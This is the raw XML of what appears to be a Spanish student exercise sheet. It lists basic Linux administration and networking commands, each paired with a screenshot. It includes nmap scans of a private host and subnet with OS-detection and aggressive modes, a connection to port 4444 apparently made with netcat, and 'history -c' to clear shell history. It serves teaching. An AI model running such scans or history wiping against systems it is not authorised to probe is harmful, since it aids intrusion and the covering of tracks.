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1B21E8E7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481D8DB1" w14:textId="7490A460" w:rsidR="00CC1CD1" w:rsidRPr="00206562" w:rsidRDefault="00CC1CD1" w:rsidP="00206562">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6BFEF1E8" wp14:editId="31A9C4A7">
            <wp:extent cx="5400040" cy="4234815"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1400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45" name="Imagen 14009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233" w14:textId="77777777" w:rsidR="00206562" w:rsidRPr="00206562" w:rsidRDefault="00000000" w:rsidP="00206562">
      <w:r>
        <w:lastRenderedPageBreak/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266F58EB" w14:textId="256FC592" w:rsidR="00CC1CD1" w:rsidRDefault="00CC1CD1" w:rsidP="00206562">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4BFB31F4" wp14:editId="534492A9">
            <wp:extent cx="5400040" cy="3343275"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="425495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5346" name="Imagen 4254953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45DF" w14:textId="40CCD928" w:rsidR="00CC1CD1" w:rsidRPr="00206562" w:rsidRDefault="00CC1CD1" w:rsidP="00206562">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0DB3A01D" wp14:editId="48F129F2">
            <wp:extent cx="5400040" cy="3708400"/>
            <wp:effectExtent l="0" t="0" r="0" b="6350"/>
            <wp:docPr id="8360453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45315" name="Imagen 836045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82C1" w14:textId="77777777" w:rsidR="00206562" w:rsidRPr="00206562" w:rsidRDefault="00000000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77777777" w:rsidR="00206562" w:rsidRDefault="00206562" w:rsidP="00206562">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00206562">
        <w:t>groups</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00206562">
        <w:t xml:space="preserve"> alumno1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C3E4B2F" w14:textId="151F12F5" w:rsidR="00CC1CD1" w:rsidRPr="00206562" w:rsidRDefault="00CC1CD1" w:rsidP="00206562">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="64270410" wp14:editId="480E60DE">
            <wp:extent cx="5400040" cy="4625340"/>
            <wp:effectExtent l="0" t="0" r="0" b="3810"/>
            <wp:docPr id="11149971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7152" name="Imagen 1114997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00000" w:rsidP="00206562">
      <w:r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72F9BD5E" w14:textId="77777777" w:rsidR="00206562" w:rsidRPr="00206562" w:rsidRDefault="00206562" w:rsidP="00206562">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00206562">
        <w:t>mkdir</w:t>
      </w:r>
      <w:proofErr w:type="spell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07C2F37C" w14:textId="6E214847" w:rsidR="0076209E" w:rsidRDefault="0076209E" w:rsidP="00206562">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0DDEC4A8" wp14:editId="786650EB">
            <wp:extent cx="5400040" cy="4092575"/>
            <wp:effectExtent l="0" t="0" r="0" b="3175"/>
            <wp:docPr id="19396067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6775" name="Imagen 19396067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F863" w14:textId="77777777" w:rsidR="00CC1CD1" w:rsidRPr="00206562" w:rsidRDefault="00CC1CD1" w:rsidP="00206562"/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77777777" w:rsidR="00206562" w:rsidRDefault="00206562" w:rsidP="00206562">
      <w:r w:rsidRPr="00206562">
        <w:t xml:space="preserve">sudo </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00206562">
        <w:t>chown</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00206562">
        <w:t xml:space="preserve"> alumno</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00206562">
        <w:t>1:seguridad</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00206562">
        <w:t xml:space="preserve"> archivo.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="664997BB" w14:textId="5C4DF6D3" w:rsidR="0076209E" w:rsidRPr="00206562" w:rsidRDefault="0076209E" w:rsidP="00206562">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3602F656" wp14:editId="4759023D">
            <wp:extent cx="5400040" cy="4744720"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="5490368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36809" name="Imagen 5490368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63D4275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10467D08" w14:textId="13353C8E" w:rsidR="009515CA" w:rsidRPr="00206562" w:rsidRDefault="009515CA" w:rsidP="009515CA">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7C60C1F7" wp14:editId="518610DD">
            <wp:extent cx="5400040" cy="4041140"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="4628986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98640" name="Imagen 462898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0DC26FB7" w14:textId="3D789954" w:rsidR="00206562" w:rsidRDefault="00206562" w:rsidP="00206562">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00206562">
        <w:t>chmod</w:t>
      </w:r>
      <w:proofErr w:type="spell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</w:t>
      </w:r>
      <w:r w:rsidR="009515CA">
        <w:t>h</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A89A92B" w14:textId="69CA96D1" w:rsidR="009515CA" w:rsidRPr="00206562" w:rsidRDefault="009515CA" w:rsidP="00206562">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1C08C80A" wp14:editId="77F43E58">
            <wp:extent cx="5400040" cy="4267200"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="9365191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9174" name="Imagen 9365191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archivo.txt copia.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CFF8174" w14:textId="2422F0E3" w:rsidR="00C67DB1" w:rsidRPr="00206562" w:rsidRDefault="00C67DB1" w:rsidP="00206562">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6B800A7B" wp14:editId="469CE074">
            <wp:extent cx="5400040" cy="4437380"/>
            <wp:effectExtent l="0" t="0" r="0" b="1270"/>
            <wp:docPr id="7827642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4281" name="Imagen 7827642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77777777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-r carpeta1 carpeta2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="526AD5A7" w14:textId="15DABA32" w:rsidR="00C67DB1" w:rsidRPr="00206562" w:rsidRDefault="00C67DB1" w:rsidP="00206562">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0325D7BA" wp14:editId="7E33F2C6">
            <wp:extent cx="5400040" cy="4124325"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="171572656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6562" name="Imagen 17157265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10. Mover </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00206562">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>archivo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="36BC1DF4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680A668D" w14:textId="79639982" w:rsidR="00C67DB1" w:rsidRDefault="00C67DB1" w:rsidP="0020656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D04FDFE" wp14:editId="31BAB5A1">
            <wp:extent cx="5400040" cy="3738245"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="3997098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9851" name="Imagen 3997098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BAFB" w14:textId="77777777" w:rsidR="00C67DB1" w:rsidRPr="00206562" w:rsidRDefault="00C67DB1" w:rsidP="00206562">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pP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Default="00206562" w:rsidP="00206562">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00206562">
        <w:t>rm</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00206562">
        <w:t xml:space="preserve"> archivo.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="746437F8" w14:textId="54EC1C65" w:rsidR="002F2CF3" w:rsidRPr="00206562" w:rsidRDefault="002F2CF3" w:rsidP="00206562">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="010A363F" wp14:editId="63A2BE56">
            <wp:extent cx="5400040" cy="3689985"/>
            <wp:effectExtent l="0" t="0" r="0" b="5715"/>
            <wp:docPr id="177602507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5076" name="Imagen 17760250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493" w14:textId="77777777" w:rsidR="00206562" w:rsidRPr="00206562" w:rsidRDefault="00000000" w:rsidP="00206562">
      <w:r>
        <w:lastRenderedPageBreak/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477B869B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6D251904" w14:textId="2EDB465E" w:rsidR="002F2CF3" w:rsidRPr="00206562" w:rsidRDefault="002F2CF3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D275586" wp14:editId="583752A1">
            <wp:extent cx="5400040" cy="4004310"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="146927952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9524" name="Imagen 14692795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1BB738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FF978F" w14:textId="77777777" w:rsid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</w:p>
    <w:p w14:paraId="3DA63BCD" w14:textId="15C0A1DA" w:rsidR="002F2CF3" w:rsidRPr="00206562" w:rsidRDefault="002F2CF3" w:rsidP="00206562">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1A0DE963" wp14:editId="2180CEA6">
            <wp:extent cx="5400040" cy="3439160"/>
            <wp:effectExtent l="0" t="0" r="0" b="8890"/>
            <wp:docPr id="20914513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1328" name="Imagen 20914513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2ED5FABD" w14:textId="77777777" w:rsidR="00206562" w:rsidRDefault="00206562" w:rsidP="00206562">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00206562">
        <w:t>kill</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00206562">
        <w:t xml:space="preserve"> -9 PID</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25DA984F" w14:textId="1F4F509A" w:rsidR="002F2CF3" w:rsidRPr="00206562" w:rsidRDefault="002F2CF3" w:rsidP="00206562">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="40D3E2A9" wp14:editId="2757CF20">
            <wp:extent cx="5400040" cy="1494790"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="7274431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43116" name="Imagen 7274431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DAD" w14:textId="77777777" w:rsidR="00206562" w:rsidRPr="00206562" w:rsidRDefault="00000000" w:rsidP="00206562">
      <w:r>
        <w:pict w14:anchorId="4A4F5BDC">
          <v:rect id="_x0000_i1039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3700E7F5" w14:textId="07FA7FBC" w:rsidR="002F2CF3" w:rsidRPr="00206562" w:rsidRDefault="002F2CF3" w:rsidP="00206562">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="30030506" wp14:editId="1B83594A">
            <wp:extent cx="5400040" cy="1609725"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="90978803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8039" name="Imagen 9097880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4D" w14:textId="77777777" w:rsidR="00206562" w:rsidRPr="00206562" w:rsidRDefault="00000000" w:rsidP="00206562">
      <w:r>
        <w:lastRenderedPageBreak/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24AAF7D1" w14:textId="77777777" w:rsidR="00206562" w:rsidRDefault="00206562" w:rsidP="00206562">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00206562">
        <w:t>netstat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6117D5A4" w14:textId="483EC97D" w:rsidR="002F2CF3" w:rsidRDefault="002F2CF3" w:rsidP="00206562">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2BC488DE" wp14:editId="6F1D8FCE">
            <wp:extent cx="5400040" cy="2138680"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="17637604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0495" name="Imagen 17637604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26A" w14:textId="77777777" w:rsidR="002F2CF3" w:rsidRPr="00206562" w:rsidRDefault="002F2CF3" w:rsidP="00206562"/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Default="00206562" w:rsidP="00206562">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00206562">
        <w:t>lsof</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00206562">
        <w:t xml:space="preserve"> -i</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E792009" w14:textId="64BC4862" w:rsidR="002F2CF3" w:rsidRPr="00206562" w:rsidRDefault="002F2CF3" w:rsidP="00206562">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2631D5C8" wp14:editId="337CED26">
            <wp:extent cx="5400040" cy="3322320"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="183273665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6657" name="Imagen 18327366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3E2" w14:textId="77777777" w:rsidR="00206562" w:rsidRPr="00206562" w:rsidRDefault="00000000" w:rsidP="00206562">
      <w:r>
        <w:pict w14:anchorId="475C8AE5">
          <v:rect id="_x0000_i1042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22C2736E" w:rsidR="00206562" w:rsidRDefault="002F2CF3" w:rsidP="00206562">
      <w:r w:rsidRPr="00206562">
        <w:t>W</w:t>
      </w:r>
      <w:r w:rsidR="00206562" w:rsidRPr="00206562">
        <w:t>ho</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57F83661" w14:textId="70141A8E" w:rsidR="002F2CF3" w:rsidRPr="00206562" w:rsidRDefault="002F2CF3" w:rsidP="00206562">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4E4BB2AB" wp14:editId="1C77568F">
            <wp:extent cx="5400040" cy="1348740"/>
            <wp:effectExtent l="0" t="0" r="0" b="3810"/>
            <wp:docPr id="88134872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48728" name="Imagen 8813487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39477B2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064D2B2B" w14:textId="132DC5AC" w:rsidR="00206562" w:rsidRDefault="002F2CF3" w:rsidP="00206562">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00206562">
        <w:t>H</w:t>
      </w:r>
      <w:r w:rsidR="00206562" w:rsidRPr="00206562">
        <w:t>istory</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="296AFE4D" w14:textId="04EF351C" w:rsidR="002F2CF3" w:rsidRPr="00206562" w:rsidRDefault="002F2CF3" w:rsidP="00206562">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="67D51E67" wp14:editId="1B90369E">
            <wp:extent cx="5400040" cy="4142740"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="62120493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4932" name="Imagen 6212049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705FF3B3" w14:textId="77777777" w:rsidR="00206562" w:rsidRDefault="00206562" w:rsidP="00206562">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00206562">
        <w:t>history</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00206562">
        <w:t xml:space="preserve"> -c</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35EBE268" w14:textId="477D04DF" w:rsidR="008E32AF" w:rsidRPr="00206562" w:rsidRDefault="008E32AF" w:rsidP="00206562">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2230C704" wp14:editId="14905E2F">
            <wp:extent cx="5400040" cy="2025650"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="98086014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0140" name="Imagen 9808601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13F9A181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192.168.1.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="385A12BB" w14:textId="32BE6988" w:rsidR="008E32AF" w:rsidRPr="00206562" w:rsidRDefault="008E32AF" w:rsidP="00206562">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4DE34652" wp14:editId="5197EEAC">
            <wp:extent cx="5400040" cy="2174240"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="178077295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2959" name="Imagen 17807729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-p 22,80,443 192.168.1.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FE9E8F4" w14:textId="6C97F4FF" w:rsidR="008E32AF" w:rsidRPr="00206562" w:rsidRDefault="008E32AF" w:rsidP="00206562">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1C9ED73F" wp14:editId="1B9567B8">
            <wp:extent cx="5400040" cy="2113280"/>
            <wp:effectExtent l="0" t="0" r="0" b="1270"/>
            <wp:docPr id="213886382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3829" name="Imagen 21388638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168D588F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-F 192.168.1.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DFB6444" w14:textId="4E683E33" w:rsidR="008E32AF" w:rsidRPr="00206562" w:rsidRDefault="008E32AF" w:rsidP="00206562">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="10271335" wp14:editId="2E174481">
            <wp:extent cx="5400040" cy="2010410"/>
            <wp:effectExtent l="0" t="0" r="0" b="8890"/>
            <wp:docPr id="44073135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31354" name="Imagen 4407313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192.168.1.0/24</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52117402" w14:textId="40CB8F83" w:rsidR="008E32AF" w:rsidRPr="00206562" w:rsidRDefault="008E32AF" w:rsidP="00206562">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5C4D6CB5" wp14:editId="53CA8D44">
            <wp:extent cx="5400040" cy="1710055"/>
            <wp:effectExtent l="0" t="0" r="0" b="4445"/>
            <wp:docPr id="207738026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0267" name="Imagen 20773802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77777777" w:rsidR="00206562" w:rsidRDefault="00206562" w:rsidP="00206562">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00206562">
        <w:lastRenderedPageBreak/>
        <w:t>nmap</w:t>
      </w:r>
      <w:proofErr w:type="spell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192.168.1.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="640729B6" w14:textId="599BC1A5" w:rsidR="008E32AF" w:rsidRPr="00206562" w:rsidRDefault="008E32AF" w:rsidP="00206562">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4760C563" wp14:editId="1DB0A2B4">
            <wp:extent cx="5400040" cy="2357755"/>
            <wp:effectExtent l="0" t="0" r="0" b="4445"/>
            <wp:docPr id="89028898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88982" name="Imagen 8902889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</w:p>
    <w:p w14:paraId="7DA6B611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-O 192.168.1.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C89D54F" w14:textId="72AA0D31" w:rsidR="00E069D6" w:rsidRPr="00206562" w:rsidRDefault="00E069D6" w:rsidP="00206562">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="00C8F68F" wp14:editId="477A0AE1">
            <wp:extent cx="5400040" cy="2164080"/>
            <wp:effectExtent l="0" t="0" r="0" b="7620"/>
            <wp:docPr id="233909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91" name="Imagen 23390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5A177798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-A 192.168.1.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1096FFA9" w14:textId="5E54C5F3" w:rsidR="00E069D6" w:rsidRPr="00206562" w:rsidRDefault="00E069D6" w:rsidP="00206562">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="753AE992" wp14:editId="03AA53B1">
            <wp:extent cx="5400040" cy="2720340"/>
            <wp:effectExtent l="0" t="0" r="0" b="3810"/>
            <wp:docPr id="175933265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2657" name="Imagen 17593326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</w:p>
    <w:p w14:paraId="1B92A097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192.168.1.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59178610" w14:textId="7E16D558" w:rsidR="00E069D6" w:rsidRPr="00206562" w:rsidRDefault="00E069D6" w:rsidP="00206562">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4D039D75" wp14:editId="63173C9A">
            <wp:extent cx="5400040" cy="2003425"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="109050978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9781" name="Imagen 10905097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77777777" w:rsidR="00206562" w:rsidRDefault="00206562" w:rsidP="00206562">
      <w:r w:rsidRPr="00206562">
        <w:t>ping google.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08515EC5" w14:textId="7827318E" w:rsidR="00E069D6" w:rsidRPr="00206562" w:rsidRDefault="00E069D6" w:rsidP="00206562">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="12A514DE" wp14:editId="496EC3BF">
            <wp:extent cx="5400040" cy="2766060"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="14909016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167" name="Imagen 1490901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58F96915" w14:textId="77777777" w:rsidR="00206562" w:rsidRDefault="00206562" w:rsidP="00206562">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00206562">
        <w:t>traceroute</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00206562">
        <w:t xml:space="preserve"> google.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EDCF020" w14:textId="39FE2D43" w:rsidR="00E069D6" w:rsidRPr="00206562" w:rsidRDefault="00E069D6" w:rsidP="00206562">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="671B37C8" wp14:editId="48F4CEE6">
            <wp:extent cx="5400040" cy="2174240"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="209626222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2227" name="Imagen 20962622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F41" w14:textId="77777777" w:rsidR="00206562" w:rsidRPr="00206562" w:rsidRDefault="00000000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a</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39028F54" w14:textId="0FAA8176" w:rsidR="00E069D6" w:rsidRPr="00206562" w:rsidRDefault="00E069D6" w:rsidP="00206562">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1B3540B2" wp14:editId="11989230">
            <wp:extent cx="5400040" cy="2602230"/>
            <wp:effectExtent l="0" t="0" r="0" b="7620"/>
            <wp:docPr id="106736686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6864" name="Imagen 10673668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</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00206562">
        <w:t>route</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="4E0A926C" w14:textId="464ABA10" w:rsidR="004D7815" w:rsidRPr="00206562" w:rsidRDefault="004D7815" w:rsidP="00206562">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3BD0DD7E" wp14:editId="41CE9557">
            <wp:extent cx="5400040" cy="1711325"/>
            <wp:effectExtent l="0" t="0" r="0" b="3175"/>
            <wp:docPr id="121337582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5827" name="Imagen 12133758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19DD27CA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</w:p>
    <w:p w14:paraId="2420C9F6" w14:textId="62A85A82" w:rsidR="004D7815" w:rsidRPr="00206562" w:rsidRDefault="004D7815" w:rsidP="00206562">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6FA50E55" wp14:editId="1FBEEF43">
            <wp:extent cx="5400040" cy="1732280"/>
            <wp:effectExtent l="0" t="0" r="0" b="1270"/>
            <wp:docPr id="126333615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6156" name="Imagen 126333615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77777777" w:rsidR="00206562" w:rsidRDefault="00206562" w:rsidP="00206562">
      <w:r w:rsidRPr="00206562">
        <w:lastRenderedPageBreak/>
        <w:t>nslookup google.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A012F43" w14:textId="1CFE4088" w:rsidR="004D7815" w:rsidRPr="00206562" w:rsidRDefault="004D7815" w:rsidP="00206562">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="60FE70E7" wp14:editId="10592D37">
            <wp:extent cx="5400040" cy="3197225"/>
            <wp:effectExtent l="0" t="0" r="0" b="3175"/>
            <wp:docPr id="146632656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26560" name="Imagen 146632656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52609419" w14:textId="77777777" w:rsidR="00206562" w:rsidRDefault="00206562" w:rsidP="00206562">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00206562">
        <w:t>dig</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00206562">
        <w:t xml:space="preserve"> google.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B5BAC15" w14:textId="7DE68EF1" w:rsidR="004D7815" w:rsidRPr="00206562" w:rsidRDefault="004D7815" w:rsidP="00206562">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1106B0D6" wp14:editId="273EE6E0">
            <wp:extent cx="5400040" cy="3096260"/>
            <wp:effectExtent l="0" t="0" r="0" b="8890"/>
            <wp:docPr id="146259968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9684" name="Imagen 146259968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471D26D6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36A32012" w14:textId="71DEA6AF" w:rsidR="004D7815" w:rsidRPr="00206562" w:rsidRDefault="004D7815" w:rsidP="00206562">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="05AD8B61" wp14:editId="5A7BAAD1">
            <wp:extent cx="5400040" cy="1457960"/>
            <wp:effectExtent l="0" t="0" r="0" b="8890"/>
            <wp:docPr id="3651874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7437" name="Imagen 3651874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BEE7" w14:textId="77777777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192.168.1.1 4444</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="395CE568" w14:textId="2533599C" w:rsidR="004D7815" w:rsidRPr="00206562" w:rsidRDefault="004D7815" w:rsidP="00206562">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3E0185C5" wp14:editId="048BA6CE">
            <wp:extent cx="5400040" cy="2133600"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1581907186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7186" name="Imagen 158190718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6A4EBE4D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</w:p>
    <w:p w14:paraId="744E0B71" w14:textId="09E4903A" w:rsidR="004D7815" w:rsidRPr="00206562" w:rsidRDefault="004D7815" w:rsidP="00206562">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="207DBC0B" wp14:editId="48ED29E5">
            <wp:extent cx="5400040" cy="1936115"/>
            <wp:effectExtent l="0" t="0" r="0" b="6985"/>
            <wp:docPr id="25820117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1171" name="Imagen 25820117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</w:p>
    <w:p w14:paraId="4B94D5F2" w14:textId="77777777" w:rsidR="00206562" w:rsidRDefault="00206562" w:rsidP="00206562">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00206562">
        <w:t>arp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00206562">
